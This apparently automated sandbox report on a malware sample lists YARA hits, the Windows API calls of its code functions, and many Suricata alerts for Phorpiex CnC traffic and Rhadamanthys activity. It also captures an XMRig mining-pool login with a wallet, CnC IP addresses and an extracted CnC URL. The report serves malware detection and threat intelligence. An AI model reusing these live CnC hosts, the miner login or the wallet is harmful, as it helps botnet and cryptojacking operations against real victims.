                          Source: Yara matchFile source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.3945886291.000001A567EC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED
                          Source: global trafficTCP traffic: 192.168.2.11:50039 -> 185.215.113.66:5152 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47feq5mtn8mcl91sadm6ooigyfkddgftchftudhdqloyz4kps7jg19n1ua8eswuzometjqqkkkzr6nmcbuwa3htua2dee6e","pass":"x","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                          Source: f5TWdT5EAc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                          Source: Binary string: wkernel32.pdb source: 2779421088.exe, 00000009.00000003.1604616177.0000000003400000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604539581.00000000014D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608139891.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608065635.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdb source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdb source: 2779421088.exe, 00000009.00000003.1603556707.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1603764627.0000000003570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607175100.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607399496.00000000050B0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdbUGP source: 2779421088.exe, 00000009.00000003.1604175260.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604329235.0000000003520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607701543.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607877443.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdbUGP source: 2779421088.exe, 00000009.00000003.1603556707.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1603764627.0000000003570000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607175100.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607399496.00000000050B0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: 2779421088.exe, 00000009.00000003.1604175260.0000000003380000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604329235.0000000003520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607701543.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1607877443.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernel32.pdbUGP source: 2779421088.exe, 00000009.00000003.1604616177.0000000003400000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1604539581.00000000014D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608139891.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608065635.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdbUGP source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, 2779421088.exe, 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004066B0
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406570
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_004066B0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406570
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004066B0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406570
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F71B09 FindFirstFileExW,9_2_00F71B09
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeCode function: 13_2_001D1A20 memset,memset,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,PathCombineW,CharLowerW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathCombineW,FindNextFileW,CloseHandle,13_2_001D1A20
                          Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp12_2_00000270F6670511

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.11:63463 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 95.81.102.72:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 92.38.19.10:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49756 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 185.215.113.66:80 -> 192.168.2.11:49710
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49747 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.187.91.108:40500
                          Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 92.255.85.66:5188 -> 192.168.2.11:49792
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49781 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 45.150.24.42:40500
                          Source: Network trafficSuricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.11:49721 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 109.74.69.43:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49800 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49819 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.133.136.145:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.176.72.136:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49838 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 89.236.217.71:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 89.219.115.156:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49860 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 213.230.126.39:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49903 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 217.30.162.161:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49912 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 95.59.165.102:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49922 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49933 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.179.117.33:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49941 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 88.204.241.182:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 90.156.160.30:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49963 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49971 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49981 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 154.71.253.54:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 92.124.152.236:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49991 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 90.156.162.5:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:49953 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50003 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50020 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 151.242.48.19:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50028 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 31.47.175.39:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50033 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50035 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 78.109.103.103:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 85.9.133.202:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 38.222.194.190:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50041 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50048 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 189.173.142.192:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 109.68.122.14:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50054 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50057 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50046 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50050 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 46.248.34.12:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.133.70.66:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 189.167.22.36:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50068 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50070 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 198.163.204.6:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50080 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50052 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50071 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50059 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50073 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 212.13.170.223:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50089 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 5.76.0.203:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50078 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50064 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50087 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50055 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50075 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50082 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 178.67.165.88:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 178.253.102.214:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 2.180.115.76:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50045 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50084 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50038 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50031 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 37.21.118.106:40500
                          Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.11:62307 -> 89.249.62.7:40500
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50085 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50063 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50077 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50010 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50066 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50061 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50036 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.11:50043 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 185.215.113.66:80 -> 192.168.2.11:49710
                          Source: Network trafficSuricata IDS: 2853272 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound : 185.215.113.66:80 -> 192.168.2.11:49710
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.255.85.66 5188Jump to behavior
                          Source: Malware configuration extractorURLs: https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0f
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com4_2_0040AA80
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com5_2_0040AA80
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com7_2_0040AA80
                          Source: unknownNetwork traffic detected: IP country count 20
                          Source: global trafficTCP traffic: 192.168.2.11:49757 -> 109.68.122.14:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49792 -> 92.255.85.66:5188
                          Source: global trafficTCP traffic: 192.168.2.11:49799 -> 176.67.79.229:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49828 -> 38.224.37.24:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49866 -> 5.202.242.190:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49895 -> 128.65.180.156:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49910 -> 80.191.218.209:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49924 -> 90.156.160.6:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49939 -> 5.251.95.166:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49951 -> 90.156.162.125:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49964 -> 151.243.58.90:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49977 -> 88.204.241.182:40500
                          Source: global trafficTCP traffic: 192.168.2.11:49992 -> 189.150.7.86:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50005 -> 102.207.195.84:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50016 -> 134.35.64.189:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50029 -> 90.156.160.30:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50032 -> 77.44.150.37:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50034 -> 5.251.47.42:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50037 -> 90.156.163.119:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50039 -> 185.215.113.66:5152
                          Source: global trafficTCP traffic: 192.168.2.11:50040 -> 46.248.34.12:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50042 -> 90.156.162.5:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50044 -> 189.252.61.8:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50047 -> 151.232.164.243:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50049 -> 85.73.234.113:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50051 -> 89.218.44.218:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50053 -> 151.234.26.66:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50056 -> 93.123.145.179:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50058 -> 89.236.219.80:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50060 -> 146.120.17.117:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50062 -> 203.142.81.102:40500
